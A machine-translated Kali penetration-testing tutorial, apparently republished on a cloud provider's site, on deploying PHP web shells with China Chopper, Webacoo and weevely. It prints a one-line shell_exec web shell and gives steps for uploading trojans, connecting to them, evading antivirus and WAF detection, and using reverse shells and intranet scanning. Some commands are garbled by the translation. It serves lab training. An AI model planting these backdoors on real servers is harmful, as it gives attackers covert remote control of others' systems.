Small white diary 51:kali penetration test Web penetration-webshell (Chinese kitchen knives, Webacoo, weevely)

Source: Internet
Author: User

Webshell

Essence: <?php echo shell_exec ($_get[' cmd ');? >

Windows platform

Chinese Kitchen Knife official website: Fat client program, domestic in relatively excellent webshell, applicability strong "But the version of a lot of chaos, there may be Trojans, said the official website http://www.maicaidao.co/"

1, the use of upload vulnerability, first upload a sentence trojan "support three kinds of server-side PHP, ASP," ASP.

Connect metasploitable using SSH

Create a file that contains a Trojan code

2, connect the appropriate server side

Add server-side URL "password as a word in the Trojan parameters"

Double click to enter the file management interface

You can also enter the command line mode "Virtual Terminal" {Permissions only for Web program run permissions}

may be detected by IDs, AV, WAF, scanner software "can be encoded to kill"

Kali platform under the Webshell, essentially similar to Chinese kitchen knives, has the encoding function, can avoid being Avira

Webacoo(Web backdoor Cookie) "PHP only"

Gets the shell of the class terminal

Encoded communication content through the cookie head transmission, strong concealment

Parameters:

CM:BASE64 encoded commands

CN: The name of the cookie header used by the server to return data

CP: Return information delimiter

1. Generate server-side

Wenacoo-g-O a.php

# # Server root directory uploaded to Metaspolitable using SCP

Move webacoo.php to the Web root directory

2. Connect using the Client

WEBACOO-T-U http://1.1.1.1/a.php

# #抓包分析如何通过cookie头传指令, manually trigger traffic "CM/CN/CP"

Other parameters

Webacoo-h

weevely  "Using HTTP headers for instruction (encoded) transmission"

Hidden class terminal PHP Webshell

There are more than 30 management modules

Execute system commands, browse file system

Check server Common configuration errors

To create a forward, reverse TCP shell connection

Proxy HTTP traffic through the target computer

Run port scan from Target computer, infiltrate intranet

Support Connection Password

*****************************************************************

# #kali中缺少库

https://pypi.python.org/pypi/PySocks/"Download library file Compression Package"

./setup.py Install

****************************************************************************************

1, generate the service side "to generate a coded Trojan"

weevely Generate <password> <path>

# #上传木马

2. Connecting clients

weevely <URL> <password> [cmd]

3. Module

Help

Small white diary 51:kali penetration test Web penetration-webshell (Chinese chopper, WEBACOO, weevely)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.